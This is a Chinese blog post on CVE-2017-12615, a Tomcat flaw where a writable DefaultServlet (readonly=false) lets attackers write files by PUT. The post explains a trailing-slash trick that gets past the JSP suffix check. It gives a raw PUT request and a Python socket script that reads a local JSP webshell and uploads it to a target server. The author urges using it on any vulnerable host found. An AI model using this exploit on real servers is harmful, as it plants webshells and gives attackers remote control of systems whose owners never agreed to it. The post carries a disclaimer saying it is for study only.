Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

原理

漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。

影响版本

不清楚,测试环境 8.5.19 看到就怼

姿势

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

可以用burpsuite抓包修改 本想用c写个利用代码的,唉,实属学艺不精  上py

import socket
url = 'url'
port = 8080
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((url, port))


with open('E:/webshell/shell/jsp/devilzShell.jsp','rb',True) as fp:
    shellcode = fp.read().decode()

poc = 'PUT /zshell.jsp/ HTTP/1.1\r\n'\
'Host: url\r\n'\
'Accept: */*\r\n'\
'Accept-Language: en\r\n'\
'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\n'\
'Connection: close\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'content-length:'+str(len(shellcode))+'\r\n\r\n'\
+shellcode


sock.send(poc.encode())
response = b''
buff = sock.recv(1024)
while buff:
    response += buff
    buff = sock.recv(1024)
print(response.decode())

搞了半天,不知道http库之类的怎么发送原始数据包,就选socket了 读取shell文件 put上去 

大致是长这样的

08.png

本博客所有文章如无特别注明均为原创。作者:odaycaogen复制或转载请以超链接形式注明转自 123``blog
原文地址《Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

郑重声明:本文只做技术交流学习使用,请尊重当地法规法律,勿对企业或个人网站及app进行破坏。如产生连带法律责任 123``blog 作者本人概不负责。

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)